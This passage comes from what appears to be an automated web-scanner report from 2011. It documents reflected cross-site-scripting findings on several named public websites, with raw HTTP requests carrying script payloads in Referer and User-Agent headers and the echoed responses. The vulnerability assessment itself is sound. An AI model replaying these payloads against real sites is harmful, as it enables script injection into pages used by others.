<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 7594a--><img src=a onerror=alert(1)>fe2c7a68223 -->
...[SNIP]...

4.1961. http://www.autobytel.com/sitemap/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /sitemap/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c0fd"%3balert(1)//38463dba680 was submitted in the Referer HTTP header. This input was echoed as 8c0fd";alert(1)//38463dba680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=8c0fd"%3balert(1)//38463dba680

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 51466
Expires: Mon, 24 Jan 2011 23:58:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:01 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E8c0fd%22%3Balert%281%29%2F%2F38463dba680;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~8c0fd";alert(1)//38463dba680";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "489EABB1-B1BF-CB67-0D71E231
...[SNIP]...

4.1962. http://www.autobytel.com/sitemap/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /sitemap/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3a4d7--><img%20src%3da%20onerror%3dalert(1)>cdcd125056f was submitted in the Referer HTTP header. This input was echoed as 3a4d7--><img src=a onerror=alert(1)>cdcd125056f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=3a4d7--><img%20src%3da%20onerror%3dalert(1)>cdcd125056f

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3a4d7%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ecdcd125056f;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51504


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 3a4d7--><img src=a onerror=alert(1)>cdcd125056f -->
...[SNIP]...

4.1963. http://www.autobytel.com/used-cars.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /used-cars.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3f77f--><img%20src%3da%20onerror%3dalert(1)>952fad2b451 was submitted in the Referer HTTP header. This input was echoed as 3f77f--><img src=a onerror=alert(1)>952fad2b451 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=3f77f--><img%20src%3da%20onerror%3dalert(1)>952fad2b451

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 79211
Expires: Mon, 24 Jan 2011 23:57:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:20 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:20 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3f77f%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E952fad2b451;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 3f77f--><img src=a onerror=alert(1)>952fad2b451 -->
...[SNIP]...

4.1964. http://www.autobytel.com/used-cars.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /used-cars.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27c0b"%3balert(1)//002cd38842 was submitted in the Referer HTTP header. This input was echoed as 27c0b";alert(1)//002cd38842 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=27c0b"%3balert(1)//002cd38842

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:02 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E27c0b%22%3Balert%281%29%2F%2F002cd38842;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79171


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~27c0b";alert(1)//002cd38842";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4895AAAF-FE42-6669-6F37A1DC
...[SNIP]...

4.1965. http://www.autobytel.com/x22 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /x22

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e06"%3balert(1)//2a52afd2bf7 was submitted in the Referer HTTP header. This input was echoed as 22e06";alert(1)//2a52afd2bf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=22e06"%3balert(1)//2a52afd2bf7

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23524
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 16:04:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 16:04:17 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.172CKMKY; path=/
Set-Cookie: USER_UUID_VCH=37AD3AB4%2DBAF7%2D6BA7%2DE71A97FD3CDF7150;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A16%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A16%27%7D;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: ID=13148%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:17 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7E22e06%22%3Balert%281%29%2F%2F2a52afd2bf7;path=/
Set-Cookie: PV_CT=1;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: www.google.com --> <!-- Referer: http://www.google.com/search?hl=en&q=22e06"%3baler
...[SNIP]...
ables
           
           
           //A. Newman 3/14/06 - add search variables
           
           
           //Paul Koch 8/18/10 - ad count
           s.prop32 = "ads - 0"
           
           //Zane 2/11/10 - BData
           
               s.prop34 = "Google Search~22e06";alert(1)//2a52afd2bf7";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "37AD3BA7-C5E5-980C-39F35DCA
...[SNIP]...

4.1966. http://www.autobytel.com/x22 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /x22

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f34b4--><img%20src%3da%20onerror%3dalert(1)>f067754e5c4 was submitted in the Referer HTTP header. This input was echoed as f34b4--><img src=a onerror=alert(1)>f067754e5c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f34b4--><img%20src%3da%20onerror%3dalert(1)>f067754e5c4

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23587
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 16:04:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 16:04:22 GMT
Connection: close
Set-Cookie: USER_UUID_VCH=37AE39A0%2DEF73%2DFCB9%2D89EEF3E63445A8E7;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A22%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A22%27%7D;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: ID=13148%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:22 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ef067754e5c4;path=/
Set-Cookie: PV_CT=1;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: www.google.com --> <!-- Referer: http://www.google.com/search?hl=en&q=f34b4--><img%
...[SNIP]...
<!-- searchphrase: f34b4--><img src=a onerror=alert(1)>f067754e5c4 -->
...[SNIP]...

4.1967. http://www.flashedition.com/publication [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /publication

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fb84"-alert(1)-"ae36f3b6ef5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /publication?i=53162 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7fb84"-alert(1)-"ae36f3b6ef5

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:15:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=12dmn44gpbtk8m1bb761voe221; expires=Tue, 25-Jan-2011 17:15:33 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=12dmn44gpbtk8m1bb761voe221; expires=Wed, 25-Jan-2012 13:15:33 GMT
Set-Cookie: ie_warn=1; expires=Wed, 25-Jan-2012 13:15:33 GMT
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 6906


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
atitude+","+position.coords.longitude;
});
}
*/
var flashvars = {
toolbar_behavior: "old",
//Latitude_Longitude: lat_lng,
cloud: "",
Referrer: "http://www.google.com/search?hl=en&q=7fb84"-alert(1)-"ae36f3b6ef5",
VersionNo: "viewer-184",
Client_TZ_Offset: currentTime.getTimezoneOffset(),
Browser_Plugins: plugins,
Request_URI: "/publication/?i=53162",
toolbar_type: "1",
Analytics_URL:
...[SNIP]...

4.1968. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfa9'-alert(1)-'6265dee2a99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2cfa9'-alert(1)-'6265dee2a99

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:06:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:06:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932017635485; path=/; expires=Thu, 24-Jan-13 05:06:57 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=9sndsq0nnmeftdu3l1rno5rnr1; expires=Thu, 17-Feb-2011 08:40:17 GMT; path=/; domain=.networkworld.com
Content-Length: 95357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
ubtopicname: '(none)',
           pgtype: '(none)',
           subtopic: '(none)',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: 'http://www.google.com/search?hl=en&amp;q=2cfa9'-alert(1)-'6265dee2a99',
nwchannel: '(none)',
request_uri: '/community/blog/ebay-use-joomla-open-source-glue',
doc_uri: '/community/index.php',
site: 'subnet_opensource',

...[SNIP]...

4.1969. http://www.newsreaders.com/unix/utilities.html/x22 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65f0d"><script>alert(1)</script>92646acf2c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /unix/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=65f0d"><script>alert(1)</script>92646acf2c3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:16 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2768

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
<A HREF = "http://www.google.com/search?hl=en&q=65f0d"><script>alert(1)</script>92646acf2c3">
...[SNIP]...

4.1970. http://www.newsreaders.com/unix/utilities.html/x22 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload bd27a<script>alert(1)</script>df1ac160f8e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /unix/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bd27a<script>alert(1)</script>df1ac160f8e

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2764

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
</script>df1ac160f8e">&lt;http://www.google.com/search?hl=en&q=bd27a<script>alert(1)</script>df1ac160f8e&gt;</A>
...[SNIP]...

4.1971. http://www.rochenhost.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rochenhost.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload c1fb5--><script>alert(1)</script>c5cfd3457d7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

